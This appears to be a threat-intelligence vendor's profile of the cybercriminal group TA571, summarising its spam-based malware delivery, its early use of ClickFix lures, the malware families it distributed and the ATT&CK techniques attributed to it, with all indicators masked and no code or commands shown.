12 malware families

TA571

Also known asTA571

TA571 is a financially motivated cybercriminal threat actor and high-volume spam distributor that operates spam botnets and has been associated with the 404TDS traffic distribution system. Proofpoint has tracked TA571 since 2019 distributing and installing malware for cybercriminal customers, and prior reporting indicates the actor operates as an FIA (financially motivated initial access) group. TA571 has been described as an initial access broker/group whose infections can lead to ransomware. Observed malware distributed by TA571 includes Ursnif, ZLoader, DanaBot, IcedID including the Forked variant, Rhadamanthys, DarkGate, NetSupport RAT, Matanbuchus, and malware associated with TA866/Asylum Ambuscade. Reporting also notes delivery of AsyncRAT and other malware via 404TDS. TA571 commonly uses high-volume malspam, thread hijacking, HTML attachments, malicious URLs, password-protected ZIP archives, legitimate file hosting services, compromised or spoofed infrastructure, and gated delivery chains with IP and geo-fencing. The actor has also used OneDrive links in PDF attachments and VBS, JavaScript, MSI, HTA, and PowerShell-based infection chains. TA571 was an early observed user of the ClickFix social-engineering technique. Proofpoint first observed TA571 using ClickFix on 1 March 2024 in a campaign of more than 100,000 messages targeting thousands of organizations globally. In these campaigns, HTML attachments impersonated Microsoft Word or OneDrive content and tricked users into copying and executing base64-encoded PowerShell commands, leading to payloads such as DarkGate, Matanbuchus, and NetSupport RAT. TA571 also used root-certificate-themed lures similar to ClearFake. Proofpoint coined the term ClickFix based on activity by TA571 and ClearFake. TA571 has also been linked to major malware delivery campaigns. In October 2023, Proofpoint observed TA571 delivering Forked IcedID in thread-hijacking campaigns using 404TDS URLs, password-protected ZIP files, and regsvr32 execution. In January 2024, Proofpoint attributed spam distribution in a TA866-related campaign to TA571, where invoice-themed emails with PDF attachments and OneDrive-hosted JavaScript led to WasabiSeed and Screenshotter. Proofpoint first tracked Rhadamanthys in December 2022 in a campaign attributed to TA571, with post-exploitation attributed to TA866. TA571 is affiliated in reporting with infrastructure and services around 404TDS; one report states Vacant Viper is known to affiliate with TA571 and that 404TDS delivered IcedID and other malware. Proofpoint observed TA571 activity decrease or disappear from email campaign data since mid-2024.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

MITRE ATT&CK

Tradecraft

15 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

7 of 15 tactics19 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0001

Initial Access

3 techniques

T1078

Valid Accounts

T1189

Drive-by Compromise

T1566×3

Phishing

T1566.001×3

Spearphishing Attachment

T1566.002×2

Spearphishing Link

TA0002

Execution

2 techniques

T1059

Command and Scripting Interpreter

T1059.001×3

PowerShell

T1059.003

Windows Command Shell

T1204

User Execution

T1204.002×2

Malicious File

TA0003

Persistence

1 technique

T1078

Valid Accounts

TA0004

Privilege Escalation

1 technique

T1078

Valid Accounts

TA0005

Stealth

4 techniques

T1027×2

Obfuscated Files or Information

T1036

Masquerading

T1078

Valid Accounts

T1218

System Binary Proxy Execution

T1218.007

Msiexec

TA0009

Collection

1 technique

T1115

Clipboard Data

TA0011

Command and Control

1 technique

T1105×2

Ingress Tool Transfer

ARSENAL

Associated malware families

12 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen

DarkGateIn addition, TA571 has been associated with the distribution of other malware families, including variants of IcedID, NetSupportRAT, DarkGate and others.3Jun 14, 2026

IcedIDIn addition, TA571 has been associated with the distribution of other malware families, including variants of IcedID, NetSupportRAT, DarkGate and others.3Jun 14, 2026

DanaBotProofpoint first identified and named DanaBot in May 2018. Initially developed as a banking trojan, DanaBot was also used as an information stealer and loader for follow-on malware.2Jun 14, 2026

NetSupport RATThe TA571 campaign contained at least two different command lines running different PowerShell scripts, one leading to DarkGate via a downloaded HTA-file that ran another PowerShell script and one leading to NetSupport RAT via a downloaded ZIP file.2Jun 14, 2026

AsyncRATTA571 regularly uses 404 TDS in campaigns to deliver malware, including AsyncRAT, NetSupport, and DarkGate.1Mar 18, 2026

7 additional families tracked in Mallory.

IOCS

Observables

40 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

40 IOCsView more in app

Domains

21 total

••••••.com•••••••.ru••••••••.com•••••••••.net••••••••••.com•••••••••••.ru••••••••••••.com••••••.ru+13

uri

9 total

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••+1

hash.sha256

8 total

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••

Email addresses

1 total

••••@•••••.•••

ip.v4

1 total

••••••••

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

16 SOURCESView more in app

security online infoNews

Jan 27, 2026

The CAPTCHA Trap: ClearFake Malware Tricks Users Into Hacking Themselves

Referenced as a threat actor associated (in related reporting) with ClearFake-style social engineering used to deliver PowerShell-based malware via fake CAPTCHA/ClickFix lures.

proofpoint threat insight blogNews

Nov 12, 2025

Operation Endgame Quakes Rhadamanthys | Proofpoint US

Priority cybercriminal threat actor that distributed Rhadamanthys in campaigns beginning in December 2022 and has used both exclusive and broadly available malware.

bank info securityNews

May 29, 2025

Breach Roundup: Spanish Hacker Alcasec Back in the Jailhouse

TA571 is involved in phishing campaigns using fake Google Meet pages to deliver malware such as AsyncRAT, StealC, and Rhadamanthys, targeting both Windows and macOS users.

proofpointNews

May 22, 2025

A Brief History of DanaBot, Longtime Ecrime Juggernaut Disrupted by Operation Endgame | Proofpoint US

Cybercriminal group observed distributing DanaBot in email campaigns between 2018 and 2020.

+12 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping15

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal12

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables40

Domains, IPs, and hashes tied to this actor, refreshed continuously.